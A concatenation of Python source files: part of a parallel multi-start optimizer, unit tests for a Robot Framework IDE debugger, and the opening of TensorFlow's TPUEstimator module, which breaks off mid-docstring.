# Start off as many other processes running the optimize (can be 0)
processes = []
for _ in range(num_procs):
i_pt = algorithm_globals.random.uniform(low, high) # Another random point in bounds
proc = multiprocessing.Process(target=optimize_runner, args=(queue, i_pt))
processes.append(proc)
proc.start()
# While the one optimize in this process below runs the other processes will
# be running too. This one runs
# with the supplied initial point. The process ones have their own random one
sol, opt, nfev = self._optimize(fun, x0, jac, bounds)
for proc in processes:
# For each other process we wait now for it to finish and see if it has
# a better result than above
proc.join()
p_sol, p_opt, p_nfev = queue.get()
if p_opt < opt:
sol, opt = p_sol, p_opt
nfev += p_nfev
result = OptimizerResult()
result.x = sol
result.fun = opt
result.nfev = nfev
return result
def _optimize(
self,
objective_function,
initial_point,
gradient_function=None,
variable_bounds=None,
):
result = super().minimize(
objective_function, initial_point, gradient_function, variable_bounds
)
return result.x, result.fun, result.nfev
|
test_debugger.py
|
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from contextlib import contextmanager
import threading
import unittest
import time
from robotide.contrib.testrunner.TestRunnerAgent import RobotDebugger
class TestDebugger(unittest.TestCase):
def setUp(self):
self._debugger = RobotDebugger()
def test_pausing_and_resuming(self):
self.assertFalse(self._debugger.is_paused())
self._debugger.pause()
self.assertTrue(self._debugger.is_paused())
self._debugger.resume()
self.assertFalse(self._debugger.is_paused())
def test_is_breakpoint(self):
self.assertTrue(self._debugger.is_breakpoint('BuiltIn.Comment', {'args':['PAUSE']}))
self.assertFalse(self._debugger.is_breakpoint('BuiltIn.Log', {'args':['PAUSE']}))
self.assertFalse(self._debugger.is_breakpoint('BuiltIn.Comment', {'args':['Something']}))
self.assertFalse(self._debugger.is_breakpoint('Foo', {'args':[]}))
def test_step_next(self):
self._debugger.pause()
started = threading.Event()
first_keyword_done = threading.Event()
second_keyword_done = threading.Event()
third_keyword_done = threading.Event()
wait_for_step_next_before_entering_debugger = threading.Event()
def test_execution():
started.set()
with self.kw():
first_keyword_done.set()
wait_for_step_next_before_entering_debugger.wait()
with self.kw():
second_keyword_done.set()
with self.kw():
third_keyword_done.set()
with self.execution(test_execution):
self._verify_done(started)
self.assertFalse(first_keyword_done.isSet())
self._debugger.step_next()
self._verify_done(first_keyword_done)
self.assertFalse(second_keyword_done.isSet())
self._debugger.step_next()
wait_for_step_next_before_entering_debugger.set()
self._verify_done(second_keyword_done)
self.assertFalse(third_keyword_done.isSet())
self._debugger.step_next()
self._verify_done(third_keyword_done)
def _verify_done(self, event):
self.assertTrue(event.wait(timeout=5.0) or event.isSet())
@contextmanager
def kw(self, passes=True):
self._debugger.start_keyword()
yield
self._debugger.end_keyword(passes)
@contextmanager
def execution(self, executed):
t = threading.Thread(target=executed)
t.setDaemon(True)
t.start()
yield
t.join()
def test_step_over(self):
self._debugger.pause()
started = threading.Event()
first_keyword_done = threading.Event()
second_keyword_done = threading.Event()
third_keyword_done = threading.Event()
last_keyword_done = threading.Event()
def test_execution():
started.set()
with self.kw():
first_keyword_done.set()
with self.kw():
with self.kw():
pass
with self.kw():
pass
second_keyword_done.set()
with self.kw():
third_keyword_done.set()
with self.kw():
last_keyword_done.set()
with self.execution(test_execution):
self._verify_done(started)
self.assertFalse(first_keyword_done.isSet())
self._debugger.step_next()
self._verify_done(first_keyword_done)
self.assertFalse(second_keyword_done.isSet())
self._debugger.step_over()
self._verify_done(second_keyword_done)
self.assertFalse(third_keyword_done.isSet())
self._debugger.step_over()
self._verify_done(third_keyword_done)
self.assertFalse(last_keyword_done.isSet())
self._debugger.step_over()
self._verify_done(last_keyword_done)
def test_pause_on_failure(self):
self._debugger.pause_on_failure(True)
before_failure = threading.Event()
after_failure = threading.Event()
def test_execution():
with self.kw():
pass
with self.kw():
pass
before_failure.set()
with self.kw(False):
pass
with self.kw():
pass
after_failure.set()
with self.execution(test_execution):
self._verify_done(before_failure)
self.assertFalse(after_failure.isSet())
self._debugger.resume()
time.sleep(0)
self._verify_done(after_failure)
if __name__ == '__main__':
unittest.main()
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import os
import signal
import threading
import time
import traceback
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.contrib.tpu.python.ops import tpu_ops
from tensorflow.contrib.tpu.python.tpu import session_support
from tensorflow.contrib.tpu.python.tpu import tpu
from tensorflow.contrib.tpu.python.tpu import tpu_config
from tensorflow.contrib.tpu.python.tpu import tpu_context
from tensorflow.contrib.tpu.python.tpu import tpu_feed
from tensorflow.contrib.tpu.python.tpu import training_loop
from tensorflow.contrib.tpu.python.tpu import util as util_lib
from tensorflow.contrib.training.python.training import hparam
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.estimator import estimator as estimator_lib
from tensorflow.python.estimator import model_fn as model_fn_lib
from tensorflow.python.estimator import util as estimator_util
from tensorflow.python.estimator.export import export_output as export_output_lib
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_REWRITE_FOR_INFERENCE_MODE = '_rewrite_for_inference'
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops():
# Gets the variables back from TPU nodes. This means the variables updated
# by TPU will now be *synced* to host memory.
return [
array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU
system before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator evaluate increases 1 by default. So, we increase the difference.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, 'predictions, 'loss', 'train_op', and
'export_outputs`.
For evaluation, `eval_metrics `is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
@{tf.estimator.Estimator}. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must have be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function and returns a list of Tensors. `host_call` currently
works for train() and evaluate(). The Tensors returned by the function is
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with @{tf.contrib.summary.create_file_writer}.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=self.loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=hooks,
evaluation_hooks=hooks,
prediction_hooks=hooks)
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
logging.info('Shutting down %s thread.' % self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
run_infeed_loop_on_coordinator=True):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._session_cancel_timer = None
self._feed_error = None
self._finished = False
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
self._init_ops = [tpu.initialize_system(job=self._master_job)]
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _log_error(self, session, error):
"""Log an infeed or outfeed error.
This logs a short error message immediately, and schedules a timer to
emit the full stack trace and error message after a short period of time.
If the main session has terminated by the time the timer triggers, we
assume the real source of the error was from the main session and avoid
emitting a stack trace for the infeed.
Args:
session: `tf.Session`, session to be terminated error: exception that
triggered logging.
error: the Exception to log.
"""
logging.warning(
'\n\n'
'Error occurred during infeed/outfeed. This may be due to a compile '
'error in the main session. Waiting for a short time for the main '
'session to come back.\n\n%s', error)
self._feed_error = traceback.format_exc()
# If we've already encountered a feed error, don't schedule another
# cancellation op.
if self._session_cancel_timer:
return
def _cancel_session():
# Close the session to avoid the main thread from hanging. If input
# pipeline triggers any error, the infeed thread dies but the main thread
# for TPU computation waits for the infeed enqueue forever. Close the
# Session to cancel the main thread Session.run execution.
#
# We sleep for a few seconds before closing to give some time
# for the TPU compilation error, if any, propagating, from TPU to CPU
# host. Compilation errors should be reported by the main thread so that
# the program can be interrupted and users can take action. Due to a race
# condition, the infeed thread might see an error first. Closing the
# session here immediately would result in a session cancellation
# exception in the main thread, instead of the expected compile error.
# User code that depends on having the proper exception type will
# therefore be confused.
time.sleep(5)
# If the main session is still running, the infeed/outfeed errors are
# legitimate, and should be logged.
if not self._finished and self._feed_error:
logging.error('Feed error: %s', self._feed_error)
logging.error('Closing session. A RuntimeError should follow.')
session.close()
self._session_cancel_timer = threading.Thread(target=_cancel_session)
self._session_cancel_timer.daemon = True
self._session_cancel_timer.start()
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
logging.info('%s thread sleeping for %d seconds.', self._name,
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
logging.info('%s thread starting after sleep', self._name)
try:
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
except Exception as e: # pylint: disable=broad-except
self._log_error(session, e)
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
try:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
session.run(self._dequeue_ops)
logging.info('Outfeed thread finished, shutting down.')
except Exception as e: # pylint: disable=broad-except
self._log_error(session, e)
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def after_create_session(self, session, coord):
logging.info('Init TPU system')
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
def before_run(self, run_context):
self._feed_error = None
# Wait for the cancellation timer to complete before continuing.
if self._session_cancel_timer:
self._session_cancel_timer.join()
self._session_cancel_timer = None
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
if self._session_cancel_timer:
logging.warning('Feed error occurred; waiting for message.')
self._session_cancel_timer.join()
self._finished = True
logging.info('Stop infeed thread controller')
self._infeed_controller.join()
logging.info('Stop output thread controller')
self._outfeed_controller.join()
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx, enqueue_ops, dequeue_ops, run_infeed_loop_on_coordinator=False)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
following differences for TPU training:
1. This hook sets the variable for iterations_per_loop, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self, iterations, num_steps=None, last_step=None):
"""Initializes a `StopAtStepHook`.
Args:
iterations: The number of iterations to run optimizer per training loop.
num_steps: Number of steps to execute.
last_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and last_step is None:
raise ValueError('One of num_steps or last_step must be specified.')
if num_steps is not None and last_step is not None:
raise ValueError('Only one of num_steps or last_step can be specified.')
self._num_steps = num_steps
self._last_step = last_step
self._iterations = iterations
def _next_iterations(self, global_step, last_step):
gap = last_step - global_step
return min(gap, self._iterations)
def begin(self):
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
if self._last_step is None:
self._last_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(iterations, session=session)
def after_run(self, run_context, run_values):
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._last_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for prediction model. But it makes the
# TPUInfeedOutfeedSessionHook prints nice message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal
)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment yet. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_configuration_from_sharded_input_tensors(
per_host_sharded_inputs)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=ctx.tpu_ordinal_function)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
hooks = []
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=device,
invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset, batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
hooks.append(inputs.dataset_initializer_hook())
# TODO(ylc): Refactoring the code to merge the tpu ordinal logic here and the
# _InternalTPUContext.tpu_ordinal_function. We should either introduce another
# abstraction or a different helper method.
def _tpu_ordinal_function_impl(shard_index_in_host):
# We put both enqueue/dequeue op at tpu.core(0) in each replica.
replica = ctx.device_assignment.lookup_replicas(
host_id, (0, 0, 0))[shard_index_in_host]
return ctx.device_assignment.tpu_ordinal(replica=replica)
if ctx.model_parallelism_enabled:
tpu_ordinal_function = _tpu_ordinal_function_impl
else:
tpu_ordinal_function = None
def enqueue_ops_fn():
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels, signals)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
hooks = []
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=device,
invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
# TODO(b/XXX): Add predict support for PER_HOST_V2
raise TypeError('Most PREDICT not yet supported in PER_HOST_V2 mode.')
hooks.append(inputs.dataset_initializer_hook())
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
num_replicas_per_host = ctx.num_of_replicas_per_host
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_configuration_from_sharded_input_tensors(
per_host_sharded_inputs)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=ctx.tpu_ordinal_function)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). `features` can be `Tensor` or dict of string name to `Tensor`,
and `labels` could be `None`, `Tensor`, or dict of string name to `Tensor`.
TPU infeed/outfeed library expects flattened tensor list. So, `features` and
